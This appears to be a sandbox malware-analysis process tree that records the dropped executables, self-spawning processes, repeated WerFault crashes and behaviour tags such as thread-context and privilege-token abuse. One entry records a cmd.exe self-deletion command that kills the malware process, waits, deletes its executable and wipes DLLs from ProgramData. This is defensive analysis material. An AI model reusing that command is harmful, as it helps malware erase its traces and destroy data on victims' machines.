- C:\Users\Admin\Documents\Bjo6YRQODt7AzHu9PtdXdaBw.exe
  "C:\Users\Admin\Documents\Bjo6YRQODt7AzHu9PtdXdaBw.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1688
- - C:\Users\Admin\Documents\Bjo6YRQODt7AzHu9PtdXdaBw.exe
    "C:\Users\Admin\Documents\Bjo6YRQODt7AzHu9PtdXdaBw.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5384
- C:\Users\Admin\Documents\fQxshNmymB0LP3kRsHFBjXB3.exe
  "C:\Users\Admin\Documents\fQxshNmymB0LP3kRsHFBjXB3.exe"
  2⤵
  - Executes dropped EXE
  PID:3992
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 384
    3⤵
    - Program crash
    PID:2868
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 364
    3⤵
    - Program crash
    PID:5400
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 400
    3⤵
    - Program crash
    PID:5884
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 624
    3⤵
    - Program crash
    PID:1836
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 656
    3⤵
    - Program crash
    PID:3976
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 692
    3⤵
    - Executes dropped EXE
    - Program crash
    PID:5376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 600
    3⤵
    - Program crash
    PID:4972
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 636
    3⤵
    - Program crash
    PID:6388
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 832
    3⤵
    - Program crash
    PID:188
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 848
    3⤵
    - Program crash
    PID:6812
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 404
    3⤵
    - Program crash
    PID:4348
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 740
    3⤵
    - Program crash
    PID:4728
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 832
    3⤵
    - Program crash
    PID:7952
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 668
    3⤵
    - Program crash
    PID:2180
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 844
    3⤵
    - Program crash
    PID:5368
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 740
    3⤵
    - Program crash
    PID:2216
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 544
    3⤵
    - Program crash
    PID:4728
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 652
    3⤵
    - Program crash
    PID:7872
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 668
    3⤵
    - Program crash
    PID:5604
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 668
    3⤵
    - Program crash
    PID:6032
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 544
    3⤵
    - Program crash
    PID:4092
- - C:\Users\Admin\Documents\fQxshNmymB0LP3kRsHFBjXB3.exe
    "C:\Users\Admin\Documents\fQxshNmymB0LP3kRsHFBjXB3.exe"
    3⤵
    PID:3960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 348
      4⤵
      Program crash
      PID:7976
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 392
      4⤵
      Program crash
      PID:8076
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 428
      4⤵
      Program crash
      PID:7936
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 592
      4⤵
      Program crash
      PID:8384
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 660
      4⤵
      Program crash
      PID:8760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 580
      4⤵
      Program crash
      PID:9192
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 732
      4⤵
      Program crash
      PID:8788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 800
      4⤵
      Program crash
      PID:5188
- C:\Users\Admin\Documents\B6mQ5Cil2WKGthK1sbuJ8rQJ.exe
  "C:\Users\Admin\Documents\B6mQ5Cil2WKGthK1sbuJ8rQJ.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2396
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    PID:4832
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    - Executes dropped EXE
    PID:4792
- - C:\Program Files (x86)\Company\NewProduct\inst001.exe
    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
    3⤵
    - Executes dropped EXE
    PID:4760
- C:\Users\Admin\Documents\EI9Qr22bp_1ivjY7PGrVBdSi.exe
  "C:\Users\Admin\Documents\EI9Qr22bp_1ivjY7PGrVBdSi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:2492
- - C:\Users\Admin\Documents\EI9Qr22bp_1ivjY7PGrVBdSi.exe
    "C:\Users\Admin\Documents\EI9Qr22bp_1ivjY7PGrVBdSi.exe"
    3⤵
    PID:4972
- - C:\Users\Admin\Documents\EI9Qr22bp_1ivjY7PGrVBdSi.exe
    "C:\Users\Admin\Documents\EI9Qr22bp_1ivjY7PGrVBdSi.exe"
    3⤵
    PID:2216
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im EI9Qr22bp_1ivjY7PGrVBdSi.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\EI9Qr22bp_1ivjY7PGrVBdSi.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:6232
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im EI9Qr22bp_1ivjY7PGrVBdSi.exe /f
        5⤵
        Kills process with taskkill
        
        PID:5532
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:8052
- C:\Users\Admin\Documents\JRPnklIWnH6W4N1PykHy0yLU.exe
  "C:\Users\Admin\Documents\JRPnklIWnH6W4N1PykHy0yLU.exe"
  2⤵
  - Executes dropped EXE
  PID:2732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 672
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4372
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 656
    3⤵
    - Program crash
    PID:4120
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 216
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 680
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4652
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 824
    3⤵
    - Program crash
    PID:5268
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1160
    3⤵
    - Program crash
    PID:2312
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1168
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1264
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1220
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
  "C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2752
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:4960
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:3732
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:3160
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:5076
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4120
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:5140
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:5544
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:5920
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:5276
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:5376
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 24
      4⤵
      Program crash
      PID:2376
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:2820
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Executes dropped EXE
    PID:5364
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:3196
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:5432
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6276
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6604
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 24
      4⤵
      Program crash
      PID:6988
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6924
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:4468
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6532
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6992
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6560
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:5796
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6920
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:3012
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7480
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7840
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:3040
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8144
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6012
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7792
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:4280
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6024
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:3128
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:5548
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:4744
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8356
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8712
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:9148
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8732
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8368
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:9088
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:6396
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7788
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:9336
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:9724
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10068
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:4136
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10176
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7180
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10460
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10860
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11192
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10488
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:5164
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5664
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:4808
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7368
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11520
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11880
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:12212
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7964
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11756
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:12012
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:4148
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:1936
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10632
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:9492
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11984
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:5588
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8760
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7468
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8628
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:1344
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:9024
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:12672
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:13152
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:12760
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:13292
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:13140
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:13464
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:13808
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:14088
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11364
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8756
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:13416
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11576
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10832
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7944
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:14720
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15096
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:14420
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8500
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15240
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:14984
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10984
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:14880
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15392
